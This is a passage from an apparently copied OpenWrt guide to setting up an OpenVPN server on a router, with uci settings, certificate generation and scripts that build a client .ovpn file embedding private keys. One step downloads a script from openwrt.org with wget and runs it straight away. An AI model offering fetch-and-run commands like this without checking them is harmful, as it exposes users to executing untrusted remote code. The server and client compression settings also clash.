  uci set openvpn.vpnserver.client_to_client='1'
 
  uci add_list openvpn.vpnserver.push='comp-lzo yes'
  uci add_list openvpn.vpnserver.push='persist-key'
  uci add_list openvpn.vpnserver.push='persist-tun'
  uci add_list openvpn.vpnserver.push='topology subnet'
  uci add_list openvpn.vpnserver.push='route-gateway dhcp'
  uci add_list openvpn.vpnserver.push='redirect-gateway def1'
  uci add_list openvpn.vpnserver.push='route 192.168.200.0 255.255.255.0'
  uci add_list openvpn.vpnserver.push='dhcp-option DNS 192.168.1.1'
uci commit openvpn

Generate Certificates

cd /tmp && wget https://openwrt.org/_export/code/docs/guide-user/services/vpn/openvpn/server.setup?codeblock=3
 
mv server.setup?codeblock=3 create-certs.sh && chmod 754 ./create-certs.sh && ./create-certs.sh

Server – Enable & Start

/etc/init.d/openvpn enable && /etc/init.d/openvpn start

Verify if the OpenVPN Server has successfully started by running:

 ps | grep "[o]penvpn(vpnserver)"

Clients – Generate .ovpn

Your OpenVPN Client will need an .ovpn-file to connect to your OpenVPN server. This section generates a my-server.ovpn file on your router so you can later copy it to your client devices.

To connect to your router remotely (from the internet) you will need to know the router’s IP address or DNS name.

If you have a static IP from your ISP, copy/paste the script below as-is into your router. If your ISP assigns a dynamic IP, you will need to use a DDNS client service, then uncomment the wanIP="dynamic.dns.name" line, replacing dynamic.dns.name with your router’s dynamic DNS name.

Copy-paste the following commands into your router via the SSH session:

create-ovpn.sh


#!/bin/sh
 
source /lib/functions/network.sh
network_find_wan wanIf
network_get_ipaddrs wanIP $wanIf
# wanIP="dynamic.dns.name"
 
OVPN_FILE="/etc/openvpn/my-server.ovpn"
 
# Create the file fresh; appending (>>) would duplicate everything on a second run
cat > ${OVPN_FILE} <<EOF
  client
  dev tun
  proto udp
  fast-io
  remote $wanIP 1194
  remote-cert-tls server
  nobind
  persist-key
  persist-tun
  comp-lzo no
  verb 3
  key-direction 1
EOF
 
echo '<ca>'    >> ${OVPN_FILE}
cat            >> ${OVPN_FILE} < /etc/openvpn/ca.crt        
echo '</ca>'   >> ${OVPN_FILE}
 
echo '<cert>'  >> ${OVPN_FILE}
cat            >> ${OVPN_FILE} < /etc/openvpn/my-client.crt 
echo '</cert>' >> ${OVPN_FILE}
 
echo '<key>'   >> ${OVPN_FILE}
cat            >> ${OVPN_FILE} < /etc/openvpn/my-client.key 
echo '</key>'  >> ${OVPN_FILE}
 
echo '<tls-auth>'   >> ${OVPN_FILE}
cat            >> ${OVPN_FILE} < /etc/openvpn/tls-auth.key 
echo '</tls-auth>'  >> ${OVPN_FILE}
 
# Display the generated OVPN_FILE
  printf "----- Generated .ovpn file ------\n\n"
  cat ${OVPN_FILE}
 
printf "\n\n\n  . . .  DONE  . . .  \n\n\n"

copy-certs.sh

#!/bin/sh
 
echo /etc/openvpn/ca.crt       > /lib/upgrade/keep.d/openvpnserver
echo /etc/openvpn/my-server.* >> /lib/upgrade/keep.d/openvpnserver
echo /etc/openvpn/my-client.* >> /lib/upgrade/keep.d/openvpnserver
echo /etc/openvpn/dh2048.pem  >> /lib/upgrade/keep.d/openvpnserver
echo /etc/openvpn/tls-auth.*  >> /lib/upgrade/keep.d/openvpnserver

Download the certificates and upload them by SCP (the ovpn scripts), set the permissions (chmod), and check that the VPN service is working (status, the vpnserver page in LuCI, enable/start, and the running process).

Finally, download the certificate for future client installation.

INST. SOURCE
